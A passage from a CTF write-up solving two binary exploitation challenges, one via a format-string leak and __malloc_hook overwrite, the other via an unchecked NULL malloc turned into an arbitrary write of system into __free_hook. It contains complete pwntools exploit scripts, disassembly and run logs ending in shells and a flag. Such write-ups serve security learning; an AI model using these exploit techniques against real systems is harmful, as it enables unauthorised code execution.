[+] checksec for '/home/d4mianwayne/Pwning/CTFs/ductf/formats_the_theorem'
Canary : ✘
NX : ✓
PIE : ✓
Fortify : ✘
RelRO : Full
gef➤
We have almost all the protections enabled, since RELRO is Full meaning we won’t be able to overwrite the GOT entries and since the challenge description hint us toward the __malloc_hook, we have to go the usual way to overwrite the __malloc_hook with the one_gadget address and call the malloc with the help of printf which will eventually call __malloc_hook resulting in the one_gadget being executed.
Reference: https://www.jaybosamiya.com/blog/2017/04/06/adv-format-string/
Also, since the attachment had the docker container to hint towards LIBC, we can see that the binary was running in the Ubuntu 18.04 container which uses the LIBC 2.27ubuntu1.4 version, there was vuln function, which had format string vulnerabilty:-
gef➤ disas vuln
Dump of assembler code for function vuln:
0x000000000000073a <+0>: push rbp
0x000000000000073b <+1>: mov rbp,rsp
0x000000000000073e <+4>: sub rsp,0x70
0x0000000000000742 <+8>: mov rax,QWORD PTR fs:0x28
0x000000000000074b <+17>: mov QWORD PTR [rbp-0x8],rax
0x000000000000074f <+21>: xor eax,eax
0x0000000000000751 <+23>: lea rdi,[rip+0x100] # 0x858
0x0000000000000758 <+30>: call 0x5e0 <puts@plt>
0x000000000000075d <+35>: lea rax,[rbp-0x70]
0x0000000000000761 <+39>: mov rsi,rax
0x0000000000000764 <+42>: lea rdi,[rip+0x136] # 0x8a1
0x000000000000076b <+49>: mov eax,0x0
0x0000000000000770 <+54>: call 0x610 <__isoc99_scanf@plt>
0x0000000000000775 <+59>: lea rdi,[rip+0x12b] # 0x8a7
0x000000000000077c <+66>: call 0x5e0 <puts@plt>
0x0000000000000781 <+71>: lea rax,[rbp-0x70]
0x0000000000000785 <+75>: mov rdi,rax
0x0000000000000788 <+78>: mov eax,0x0
0x000000000000078d <+83>: call 0x5f0 <printf@plt>
0x0000000000000792 <+88>: lea rdi,[rip+0x11a] # 0x8b3
0x0000000000000799 <+95>: call 0x5e0 <puts@plt>
0x000000000000079e <+100>: lea rdi,[rip+0x10e] # 0x8b3
0x00000000000007a5 <+107>: call 0x5e0 <puts@plt>
0x00000000000007aa <+112>: jmp 0x751 <vuln+23>
End of assembler dump.
So, in order to exploit this binary, we first needed a LIBC leak to determine the base address of LIBC so that we will be able to determine the __malloc_hook and one_gadget address. Surprisingly, one of the LIBC address at the offset of 2, which I used to get the base address of the LIBC, then using the pwntools fmtstr_payload to write 2 bytes at a time.
from pwn import *
#p = process("./formats_the_theorem")
context.arch = "amd64"
p = remote("dctf-chall-formats-last-theorem.westeurope.azurecontainer.io", 7482)
libc = ELF("libc.so.6")
p.recvline()
p.sendline("%2$p")
p.recvline()
libc.address = int(p.recvline().strip(), 16) - 0x3ed8c0
log.info("LIBC: 0x%x" %(libc.address))
one_gadget = libc.address + 0x4f432
malloc_hook = libc.sym["__malloc_hook"]
target = one_gadget
addr = malloc_hook
count = 0
while target:
payload = fmtstr_payload(6, {addr: target & 0xffff}, write_size='short')
p.sendline(payload)
addr += 2
target >>= 16
count += 1
p.sendline("%66000c")
p.interactive()
Running the exploit:-
❯ python3 formats_the_theorem.py
[+] Opening connection to dctf-chall-formats-last-theorem.westeurope.azurecontainer.io on port 7482: Done
[*] '/home/d4mianwayne/Pwning/CTFs/ductf/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] LIBC: 0x7f483a4b2000
[*] Switching to interactive mode
I won't ask you, what your name is. It's getting kinda old at this point
you entered
[..snip..]
I won't ask you, what your name is. It's getting kinda old at this point
you entered
[..snip..]
I won't ask you, what your name is. It's getting kinda old at this point
you entered
[..snip..]
$ id
uid=1000(pilot) gid=1000(pilot) groups=1000(pilot)
$ cat flag.txt
dctf{N0t_all_7h30r3ms_s0und_g00d}
$
[*] Interrupted
Just another heap #
This challenge was solved by Faith, later he shared the exploit script for the challenge, he told me:-
it was a simple bug, malloc returned null but they didnt check for null and just added a controlled value to it(edited) [12:51 PM] PIE was disabled, so u can make malloc return null with a large size, then add any value to create a pointer to any memory address
Checking the binary with the checksec:-
gef➤ checksec
[+] checksec for '/home/d4mianwayne/Pwning/CTFs/ductf/just_another_heap'
Canary : ✓
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : Partial
gef➤
The vulnerability existed in the function Create Memory:-
unsigned __int64 create_memory()
{
unsigned __int64 v0; // rbx
const char *name; // rbx
int important; // [rsp+4h] [rbp-4Ch]
int recent; // [rsp+8h] [rbp-48h]
int i; // [rsp+Ch] [rbp-44h]
size_t size; // [rsp+10h] [rbp-40h] BYREF
size_t offset; // [rsp+18h] [rbp-38h] BYREF
unsigned __int64 idx; // [rsp+20h] [rbp-30h] BYREF
char *chunk; // [rsp+28h] [rbp-28h]
char is_important[2]; // [rsp+34h] [rbp-1Ch] BYREF
char is_recent[2]; // [rsp+36h] [rbp-1Ah] BYREF
unsigned __int64 v12; // [rsp+38h] [rbp-18h]
v12 = __readfsqword(0x28u);
if ( dword_6020C0 > 9 )
{
puts("You already have to many memories stored in here. You don't want another one.");
}
else
{
important = 0;
recent = 0;
idx = 0LL;
puts("at what page would you like to write?");
read_long((__int64)&idx);
if ( heap_list[idx] || idx > 9 )
{
puts("there is already something written at that page.");
}
else
{
puts("name:");
v0 = idx;
struct_list[v0] = malloc(0x20uLL);
read_data((char *)struct_list[idx], 16);
name = (const char *)struct_list[idx];
name[strcspn(name, "\n")] = 0;
puts("How long is your memory");
read_long((__int64)&size);
chunk = (char *)malloc(size);
puts("Sometimes our memories fade and we only remember parts of them.");
read_long((__int64)&offset);
puts("Would you like to leave some space at the beginning in case you remember later?");
if ( offset <= size )
{
if ( chunk )
{
for ( i = 0; i < offset; ++i )
chunk[i] = 95;
}
chunk += offset;
fflush(stdin);
puts("What would you like to write");
read_data(chunk, size - offset);
puts("Would you say this memory is important to you? [Y/N]");
read_data(is_important, 2);
if ( is_important[0] == 89 )
important = 1;
_IO_getc(stdin);
puts("Would you say this memory was recent? [Y/N]");
read_data(is_recent, 2);
if ( is_recent[0] == 89 )
recent = 1;
heap_list[idx] = chunk;
recent_list[idx] = recent;
important_list[idx] = important;
offset_list[idx] = offset;
size_list[idx] = size;
++dword_6020C0;
puts("Memory created successfully\n");
puts(byte_401786);
fflush(stdin);
}
else
{
puts("Invalid offset");
}
}
}
return __readfsqword(0x28u) ^ v12;
}
The vulnerability was that the program doesn’t check whether the pointer returned by the malloc is valid or not, the program also allow us to enter a, kind of, offset which will be added to the pointer returned by the malloc, since there’s no check for invalid/NULL return value from the malloc, we can exploit this one by giving a large size of the malloc which will return NULL, then we can give the address of the global array which stores the name pointer, what we will exactly do here is explained as follows:-
#!/usr/bin/env python3
from pwn import *
e = ELF("./just_another_heap")
libc = ELF("./libc.so.6")
#p = process("./just_another_heap", env={"LD_PRELOAD": "./libc.so.6"})
p = remote("dctf-chall-just-another-heap.westeurope.azurecontainer.io", 7481)
def create(idx, name, size, empty, data, important, recent):
p.sendlineafter("Exit\n", "1")
p.sendlineafter("\n", str(idx))
p.sendafter("name:\n", name)
p.sendlineafter("memory\n", str(size))
p.sendlineafter("them.\n", str(empty))
p.sendafter("write\n", data)
if important:
p.sendlineafter("\n", "Y")
else:
p.sendlineafter("\n", "N")
if recent:
p.sendlineafter("\n", "Y")
else:
p.sendlineafter("\n", "N")
def forget(idx):
p.sendlineafter("Exit\n", "3")
p.sendlineafter("forget?\n", str(idx))
def _list():
p.sendlineafter("Exit\n", "5")
With the wrapper functions, we select the address where the very last name would be stored, which in our case is 0x6022a8
memory_ptr_last_idx = 0x6022a8
puts_got = e.got["puts"]
huge = 0xFFFF0FFFFFFF
Then, we firstly create a chunk which will act as a decoy for performing rest of the exploit, we create this chunk, making the 0x6022a8 will point to the BBBBBBBBBBBBBBBB. We will also create a chunk with the name being /bin/sh\x00
create(9, "A"*0xF, 0x10, 0, "B"*0xF, False, False)
create(2, "A"*0xF, 0xa, 0, b"/bin/sh\x00\n", False, False)
Now, we will force the malloc to return NULL then make the offset to the pointer of the last chunk[9] which we overwrite with GOT address of the puts, giving us a LIBC leak.
create(0, "A"*0xF, memory_ptr_last_idx + (huge - memory_ptr_last_idx), memory_ptr_last_idx, p64(puts_got) + b"\n", False, False)
_list()
p.recvuntil("9: ")
libc.address = int.from_bytes(p.recvline(), byteorder="little") & 0xFFFFFFFFFFFF - libc.sym["puts"]
system = libc.sym["system"]
free_hook = libc.sym["__free_hook"]
log.info("Libc base @ " + hex(libc.address))
Now, doing the same, but this time we will force the malloc to again return the NULL and make the offset value to the address of the __free_hook.
create(1, "A"*0xF, free_hook + (huge - free_hook), free_hook, p64(system) + b"\n", False, False)
Now, we just free the chunk 2 which had the /bin/sh string stored resulting in system("/bin/sh"):-
forget(2)
p.interactive()
Run the exploit:-
vagrant@ubuntu-bionic:~/sharedFolder/CTFs/ductf$ python3 just_another_heap.py
[*] '/home/vagrant/sharedFolder/CTFs/ductf/just_another_heap'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/home/vagrant/sharedFolder/CTFs/ductf/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './just_another_heap': pid 1865
[*] Libc base @ 0x7f83be251000
[*] Switching to interactive mode
$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
$
[*] Interrupted
vagrant@ubuntu-bionic:~/sharedFolder/CTFs/ductf$